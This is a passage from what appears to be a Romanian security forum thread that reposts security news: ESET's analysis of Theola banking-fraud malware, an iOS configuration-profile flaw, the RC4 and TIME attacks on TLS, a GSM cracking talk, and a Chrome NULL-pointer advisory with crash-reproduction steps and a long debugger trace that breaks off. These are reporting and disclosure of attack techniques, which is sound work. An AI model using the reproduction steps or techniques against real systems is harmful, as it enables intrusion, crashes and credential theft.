Nytro

In loc sa mute un cacat dintr-o parte in alta, ar trebui sa isi mai cumpere niste servere deoarece de ceva timp merge ca pula Feisbucu asta.

Cateva detalii?

[h=1]How Theola malware uses a Chrome plugin for banking fraud[/h]By Aleksandr Matrosov posted 13 Mar 2013 at 02:50PM Win32/Theola is one of the most malicious components of the notorious bootkit family, Win32/Mebroot.FX (known since 2007). The Theola family encompasses malicious browser plugins installed by Mebroot for banking fraud operations. We have been tracking an increase in detections of these plugins since the end of January 2013. The countries where Theola is most commonly detected are the Netherlands, Norway, Italy, Denmark and Czech Republic. ESET Virus Radar statistics show the regions most affected by Theola infection during the last week in the map below. Win32/Mebroot.FX uses typical MBR infection techniques, with a malicious int13 handler used for access to the hard drive components. Malicious components are loaded in the following order: In this blog post I’m concentrating on the analysis of malicious browser plugins and on answering the question of how money is stolen from a user’s infected machine. [h=3]Chrome plugin[/h] Win32/Theola.F is a Google Chrome plugin based on the NPAPI interface (Netscape Plugin Application Programming Interface). The malicious plugin has a native module and is packed by CRX format (CRX Package Format). The CRX container contains the following manifest file with the permissions shown: The most interesting string in the manifest is “permissions”, describing the activity allowed for this plugin. This set of permissions is enough to allow fraudulent, malicious operations. Win32/Theola loads in the Google Chrome browser like this: After deobfuscation the first JavaScript method loads the native module as default-plugin for Google Chrome: This JavaScript module modifies the POST tracking method for all web forms on the loaded web page. And by making password input fields visible this method makes (for the attacker) a useful combination with the embedded video recording functionality described below. The plugin loaded in the browser extensions panel looks like this: The routine NP_GetEntryPoints() calls the plugin load process and gets the pointers to other functions needed for working with the plugin within the browser. The decompiled code of NP_GetEntryPoints() is presented here, with the Theola plugin interface: The image directly below shows the the reconstructed virtual method table (vtable) as seen in Win32/Theola’s main functionality. Theola has video recording functionality based on the open source x264 library for recording video in MPEG format. When the plugin has already started up the function addListners() loads the JavaScript code for tracking web activity on the infected machine. The JavaScript code for manipulating URLs is presented here: The method beforeNavigate() in the native module is presented here: If activity is detected on the banking web page, then Win32/Theola sends all sensitive information (passwords, credit card numbers and etc) to the special named pipe. The name of the pipe is generated by the following algorithm: All communications with the kernel-mode module and other user-mode modules are implemented with special named pipe handlers in the plugin. Each handler is responsible for the execution of specified type of events in the execution process. [h=3]Conclusion[/h] Google Chrome is one of the most popular browsers in the world and its popularity among malware developers is also growing. Win32/Theola provides its malicious module as a Chrome plugin: this is more difficult to detect because the plugin uses only documented API methods for controlling web activity. This documented API is adequate for manipulating sensitive data submitted into web forms. Much banking malware uses user-mode hooks for intercepting network activity, but Win32/Theola uses documented and legitimate methods just as effectively and by doing so is better able to bypass detection by security software. Special thanks to my colleague Anton Cherepanov Aleksandr Matrosov, Security Intelligence Team Lead SHA1 hashes for analyzed samples: Win32/Theola.F (CRX plugin): 0a74c1897a8a3a56cbc4bd433e100e63f448c136 Win32/Theola.D (dll module): 5591d013f38f64f2695366ff4cb4727c94a266e9 Sursa: How Theola malware uses a Chrome plugin for banking fraud - We Live Security

[h=3]Critical iOS vulnerability in Configuration Profiles pose malware threat[/h]Posted by: Mohit Kumar onThursday, March 14, 2013 a vulnerability that could allow hackers to control and spy on iPhones. A major security vulnerability for iOS configuration profiles pose malware threat. The vulnerability affects a file known as mobileconf files, which are used by cell phone carriers to configure system-level settings. These can include Wi-Fi, VPN, email, and APN settings. Apple used to use them to deliver patches, and carriers sometimes use them to distribute updates. Adi Sharabani, CEO and co-founder of Skycure, made a demonstration that how sensitive information, including the victim’s exact location, could be retrieved, while also controlling the user’s iPhone. In Demo, he setup a fake website with a prompt to install a configuration profile and sent the link out to Victim. After installing it, he found out they were able to pull passwords and other data without his knowledge. These malicious profiles can be emailed or downloaded from Web pages and after being installed, and attacker able to change a large number of iPhone settings. If used maliciously, these profiles can be very dangerous. Even though their use is approved by Apple, they aren't subject to the standard sandboxing rules that apply to third party App Store apps and websites. Other than an attack on privacy, this could lead to more dangerous consequences as an example, it is quite easy to change a GPS destination while driving and send the smartphone owner to a location the attacker chooses. Sursa: Critical iOS vulnerability in Configuration Profiles pose malware threat - Hacking News

[h=1]Two new attacks on SSL decrypt authentication cookies[/h][h=2]Aging standard isn't holding up very well in face of sophisticated attacks.[/h] by Dan Goodin - Mar 14 2013, 6:05pm GTBST Werwin15 Researchers have devised two new attacks on the Transport Layer Security and Secure Sockets Layer protocols, the widely used encryption schemes used to secure e-commerce transactions and other sensitive traffic on the Internet. The pair of exploits—one presented at the just-convened 20th International Workshop on Fast Software Encryption and the other scheduled to be unveiled on Thursday at the Black Hat security conference in Amsterdam—don't pose an immediate threat to the millions of people who rely on the Web-encryption standards. Still, they're part of a growing constellation of attacks with names including BEAST, CRIME, and Lucky 13 that allow determined hackers to silently decrypt protected browser cookies used to log in to websites. Together, they underscore the fragility of the aging standards as they face an arsenal of increasingly sophisticated exploits. "It illustrates how serious this is that there are so many attacks going on involving a protocol that's been around for years and that's so widely trusted and used," Matthew Green, a professor specializing in cryptography at Johns Hopkins University, told Ars. "The fact that you now have CRIME, BEAST, Lucky 13, and these new two attacks within the same week really illustrates what a problem we're facing." The most serious of this week's attacks exploits weaknesses in RC4, a stream cipher that researchers estimate is used to encrypt about 50 percent of the world's TLS traffic. Cryptographers have long known of flaws in RC4. Specifically, some of the pseudo-random bytes the cipher used to encode messages were predictable. But until now scientists hadn't devised a practical way to exploit the shortcoming. A team from Royal Holloway, University of London, and the University of Illinois-Chicago has discovered that the small "biases" contained in RC4 can be manipulated in a way that reveals a limited amount of the plaintext in an encrypted data stream. It requires attackers to receive tens of millions of different encryptions of the same message. By statistically sampling them, the lack of randomness can be exploited to deduce parts of the encrypted message. "Some of us have been worried for quite a while that RC4 was becoming the dominant cipher of choice in TLS," Royal Holloway scientist Kenneth G. Paterson told Ars. "We knew that RC4 had significant problems. What we didn't know was how to exploit them in TLS. Now we do. Vendors and users are on notice: this attack is only going to get stronger." Because only small parts of message can be decrypted, the attack works best against ciphertext that contains known strings in a fixed location, such as authentication cookies. "Unfortunately, if your connection is encrypted using RC4 (as is the case with Gmail), then each time you make a fresh connection to the Gmail site, you're sending a new encrypted copy of the same cookie," Green wrote in a blog post describing the attack. "If the session is renegotiated (i.e., uses a different key) between those connections, then the attacker can build up the list of ciphertexts he needs." The number of TLS key renegotiations in the typical Web session is vastly insufficient to satisfy the tens of millions of encryptions attackers need. The scientists—who include Nadhem AlFardan, Dan Bernstein, Kenny Paterson, Bertram Poettering, and Jacob Schuldt—have therefore proposed that JavaScript working with a man-in-the-middle attacker can rapidly generate all the encrypted connections needed for the attack. A man-in-the-middle position is when the attacker has a connection between the two parties and the ability to monitor or even tamper with the messages sent back and forth. [h=2]It’s about TIME[/h] This week's other TLS attack is also able to read HTTPS-protected login credentials when end users transmit them to Web servers. The so-called TIME exploit—short for Timing Info-leak Made Easy—is in some respects a refinement of the CRIME attack that successfully decrypted HTTPS-protected browser cookies used to access user accounts on Github.com, Dropbox.com, and Stripe.com. That earlier exploit worked when both the targeted website and browser used the Google-spawned SPDY protocol or TLS compression to reduce the number of bytes contained in a file or data stream by removing redundant information. By guessing the contents of an encrypted payload character by character and then analyzing whether the compressed ciphertext grew or shrank in size, researchers Juliano Rizzo and Thai Duong were able to slowly decipher the contents. TIME works in a similar fashion. It uses JavaScript that forces a browser to send multiple requests to an online bank or other website that uses TLS. But rather than measure the number of bytes contained in the encrypted request sent by the end user, TIME measures the time it takes for websites to respond with responses that have been both encrypted and compressed. Responses that are faster will on average contain fewer bytes, allowing attackers to know that the plaintext contained in a particular guess was also contained in the encrypted data stream. By forcing a victim browser to send hundreds or thousands of requests and comparing subtle differences in the time it takes for the website to respond, the TIME attack decrypts the payload character by character until all of the contents are revealed. "The attacker no longer needs to be an eavesdropper," Tal Be'ery, Web security research team leader at security firm Imperva, said of the TIME attack he helped develop. "The attacker can just lead the victim to his site and from that point onward the attacker only needs to apply certain JavaScript to get the victim's secret data." Most of the previous exploits on TLS require the attacker to have a "man-in-the-middle" position. When combined with the CRIME techniques, TIME has no such restrictions. It's also potentially more effective than either the Lucky 13 or the other attack from this week because it requires hundreds of thousands of requests, rather than tens of millions or hundreds of millions. Be'ery said the vulnerability TIME exploits resides more in browsers than in TLS itself. Specifically, the problem lies in a bedrock security principle known as the same origin policy. It prevents cookies and most other content set by one domain from being able to read or modify data from another domain. The researcher said the policy should be extended to prevent timing attacks. "Just as the browser doesn't let JavaScript directly get the size of the request or the response to other sites... it should stop the timing information from leaking, because it enables the attacker to infer on the secret information," he told Ars. "It shouldn't be allowed to do so. Browsers need to have some mechanism for the server to say 'I don't want to give any information about this specific resource. I don't want to let it be timed.'" [h=2]Not enough Band-Aids[/h] Given the hurdle of collecting vast numbers of encrypted packets, it's unlikely either of this week's attacks—or last month's Lucky 13 exploit, for that matter—will have much practical application right away. But as new techniques are developed and new vulnerabilities are discovered, the attacks are likely to improve and may at some point overcome the resistance TLS has so far shown in withstanding the string of new exploits. Ironically, a chief reason for the large concentration of RC4-protected TLS traffic was its ability to withstand BEAST attacks. Now that both Lucky 13 and one of this week's attacks target the cipher, security engineers are running out of Band-Aids with which to harden TLS. So far, website operators and browser developers have been hesitant to replace vulnerable versions of TLS with newer versions out of fear that the changes will disrupt millions of connections. "It's not totally clear what can be done," Green told Ars, referring to a reliable fix for the Web encryption standards. "In the short term, we have better versions of TLS and we're not using them for a bunch of silly reasons, mostly to do with backward compatibility. Browser companies and people who make servers really need to get on this and they need to start moving to new versions and TLS. They need to do it soon, before these attack become really practical." Sursa: Two new attacks on SSL decrypt authentication cookies | Ars Technica

Blackhat 2010 - Attacking Phone Privacy Description: Our most popular phone technologies use decade-old proprietary cryptography. GSM's 64bit A5/1 cipher, for instance, is vulnerable to time memory trade-offs but commercial cracking hardware costs hundreds of thousands of dollars. We discuss how cryptographic improvements and the power of the community created an open GSM decrypt solution that runs on commodity hardware. Besides GSM we discuss weaknesses in DECT cordless phones. The talk concludes with an overview of mitigation steps for GSM and DECT in response to our research, some of which are already being implemented. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Blackhat 2010 - Attacking Phone Privacy

Google Chrome 21.0.1180.57 NULL Pointer Authored by Heyder Andrade Google Chrome versions 21.0.1180.57 and below suffer from a NULL pointer vulnerability in InspectDataSource::StartDataRequest. ---| overview Vulnerability: Chrome Null Pointer in InspectDataSource::StartDataRequest Date: 03/14/2012 Author: @HeyderAndrade (heyder.andrade[at]gmail[dot]com) Chrome Version: =< 21.0.1180.57 stable Operating System Tested: Win XP SP2, WIN7, Mac OS X 10.6.8 (10K549),Linux Ubuntu 12.04 Architecture: x86 and Amd64 ---| steps will reproduce this crash 1. Open the browser and visit any site that has an SSL certificate signed by a CA not trusted. an ssl error will be showed, DON'T click "proceed anayway". 2. Open a new tab and access chrome://inspect ps. I believe it should work with any ssl error, but i tested only with no valid CA error. ---| original OSX Crash Report Process: Google Chrome [767] Path: /Applications/Google Chrome.app/Contents/MacOS/Google Chrome Identifier: com.google.Chrome Version: 21.0.1180.57 (1180.57) Code Type: X86 (Native) Parent Process: launchd [158] Date/Time: 2012-08-08 22:53:09.442 -0300 OS Version: Mac OS X 10.6.8 (10K549) Report Version: 6 Interval Since Last Report: 19713 sec Crashes Since Last Report: 1 Per-App Interval Since Last Report: 19374 sec Per-App Crashes Since Last Report: 1 Anonymous UUID: B5BA5F00-E166-4923-9393-E0FC63561975 Exception Type: EXC_BAD_ACCESS (SIGBUS) Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000000 Crashed Thread: 0 CrBrowserMain Dispatch queue: com.apple.main-thread ---| source code This vulnerability lies in the function call DCHECK (line 118 of the inspect_ui.cc) the render_process_host can be NULL. file: browser/ui/webui/inspect_ui.cc line: 188 function: DCHECK(render_process_host); ---| source code fix if (!render_process_host->HasConnection()) continue; ---| timeline of disclosure - discovery vulnerability - Ago 08, 2012 - code.google.com report - Aug 15, 2012 - Chromium community fix - Oct 11, 2012 - This disclosure - Mar 14, 2013 ---| references https://chromiumcodereview.appspot.com/11066114/ (for some reason this issue was removed) https://code.google.com/p/chromium/issues/detail?id=142979 (no public) Starting program: /home/user/chrome-linux/chrome --debug https://caixa.gov.br [Thread debugging using libthread_db enabled] [New Thread 0xb2735b70 (LWP 10475)] [New Thread 0xb1f34b70 (LWP 10476)] [New Thread 0xb1733b70 (LWP 10477)] [New Thread 0xb280db70 (LWP 10478)] [New Thread 0xb0666b70 (LWP 10479)] [New Thread 0xafe65b70 (LWP 10480)] [New Thread 0xaf664b70 (LWP 10481)] [New Thread 0xaee63b70 (LWP 10482)] [New Thread 0xae662b70 (LWP 10483)] [New Thread 0xade61b70 (LWP 10484)] [New Thread 0xad660b70 (LWP 10485)] [New Thread 0xace5fb70 (LWP 10486)] [New Thread 0xace3eb70 (LWP 10487)] [New Thread 0xace1db70 (LWP 10488)] [New Thread 0xacdfcb70 (LWP 10489)] [New Thread 0xac4eeb70 (LWP 10490)] [Thread 0xac4eeb70 (LWP 10490) exited] [New Thread 0xac4eeb70 (LWP 10491)] [New Thread 0xab0fbb70 (LWP 10492)] [New Thread 0xaa8fab70 (LWP 10497)] [New Thread 0xaa0f9b70 (LWP 10498)] [New Thread 0xa9282b70 (LWP 10515)] [Thread 0xa9282b70 (LWP 10515) exited] [New Thread 0xa97abb70 (LWP 10516)] [New Thread 0xa978ab70 (LWP 10519)] [New Thread 0xa9769b70 (LWP 10520)] Program received signal SIGSEGV, Segmentation fault. 0xb40ea92b in (anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int) () #0 0xb40ea92b in (anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int) () #1 0xb40caf9b in base::internal::Invoker<4, base::internal::BindState<base::internal::RunnableAdapter<void (ChromeURLDataManager::DataSource:)(std::string const&, bool, int)>, void ()(ChromeURLDataManager::DataSource*, std::string const&, bool, int), void ()(ChromeURLDataManager::DataSource*, std::string, bool, int)>, void ()(ChromeURLDataManager::DataSource*, std::string const&, bool, int)>::Run(base::internal::BindStateBase*) () #2 0xb498c220 in MessageLoop::RunTask(base::PendingTask const&) () #3 0xb498c8c2 in MessageLoop::DeferOrRunPendingTask(base::PendingTask const&) () #4 0xb498cc31 in MessageLoop::DoWork() () #5 0xb49d58be in base::MessagePumpGlib::RunWithDispatcher(base::MessagePump::Delegate*, base::MessagePumpDispatcher*) () #6 0xb49d543c in base::MessagePumpGlib::Run(base::MessagePump::Delegate*) () #7 0xb498846e in MessageLoop::RunInternal() () #8 0xb49a4ae9 in base::RunLoop::Run() () #9 0xb46513f5 in ChromeBrowserMainParts::MainMessageLoopRun(int*) () #10 0xb65262ec in content::BrowserMainLoop::RunMainMessageLoopParts() () #11 0xb6527280 in (anonymous namespace)::BrowserMainRunnerImpl::Run() () #12 0xb65247f3 in BrowserMain(content::MainFunctionParams const&) () #13 0xb48fb758 in content::RunNamedProcessTypeMain(std::string const&, content::MainFunctionParams const&, content::ContentMainDelegate*) () #14 0xb48fb8b0 in content::ContentMainRunnerImpl::Run() () #15 0xb48fa797 in content::ContentMain(int, char const**, content::ContentMainDelegate*) () #16 0xb3fbe60b in ChromeMain () #17 0xb3fbe5c2 in main () Thread 25 (Thread 0xa9769b70 (LWP 10520)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 24 (Thread 0xa978ab70 (LWP 10519)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 23 (Thread 0xa97abb70 (LWP 10516)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 21 (Thread 0xaa0f9b70 (LWP 10498)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49be489 in base::SequencedWorkerPool::Inner::ThreadLoop(base::SequencedWorkerPool::Worker*) () #4 0xb49bec19 in base::SequencedWorkerPool::Worker::Run() () #5 0xb49bf733 in base::SimpleThread::ThreadMain() () #6 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #7 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #8 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 20 (Thread 0xaa8fab70 (LWP 10497)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365342 in pthread_cond_timedwait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b24cc in base::ConditionVariable::TimedWait(base::TimeDelta const&) () #3 0xb49b36dd in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb498e11a in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #5 0xb498846e in MessageLoop::RunInternal() () #6 0xb49a4ae9 in base::RunLoop::Run() () #7 0xb498775e in MessageLoop::Run() () #8 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #9 0xb49bfa91 in base::Thread::ThreadMain() () #10 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #11 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #12 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 19 (Thread 0xab0fbb70 (LWP 10492)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49be489 in base::SequencedWorkerPool::Inner::ThreadLoop(base::SequencedWorkerPool::Worker*) () #4 0xb49bec19 in base::SequencedWorkerPool::Worker::Run() () #5 0xb49bf733 in base::SimpleThread::ThreadMain() () #6 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #7 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #8 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 18 (Thread 0xac4eeb70 (LWP 10491)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb49bfa91 in base::Thread::ThreadMain() () #11 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #12 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #13 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 16 (Thread 0xacdfcb70 (LWP 10489)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365342 in pthread_cond_timedwait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b24cc in base::ConditionVariable::TimedWait(base::TimeDelta const&) () #3 0xb49b36dd in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb498e11a in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #5 0xb498846e in MessageLoop::RunInternal() () #6 0xb49a4ae9 in base::RunLoop::Run() () #7 0xb498775e in MessageLoop::Run() () #8 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #9 0xb49bfa91 in base::Thread::ThreadMain() () #10 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #11 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #12 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 15 (Thread 0xace1db70 (LWP 10488)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 14 (Thread 0xace3eb70 (LWP 10487)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 